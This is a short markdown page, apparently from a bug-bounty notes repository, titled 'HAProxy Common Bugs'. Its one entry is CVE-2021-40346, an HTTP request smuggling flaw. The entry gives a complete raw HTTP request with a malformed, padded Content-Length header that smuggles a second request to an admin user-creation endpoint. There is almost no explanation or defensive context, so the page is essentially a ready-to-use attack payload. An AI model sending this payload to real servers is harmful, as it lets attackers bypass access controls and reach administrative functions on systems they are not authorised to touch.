Skip to content

Latest commit

 

History

History
22 lines (17 loc) · 700 Bytes

HAProxy.md

File metadata and controls

22 lines (17 loc) · 700 Bytes
Raw

HAProxy Common Bugs

Introduction

What would you do if you came across a website that uses HAProxy?

How to Detect

-

  1. CVE-2021-40346 (HTTP Request Smuggling)
POST /index.html HTTP/1.1
Host: abc.com
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Content-Length: 60
 
GET /admin/add_user.py HTTP/1.1
Host: abc.com
abc: xyz

Source: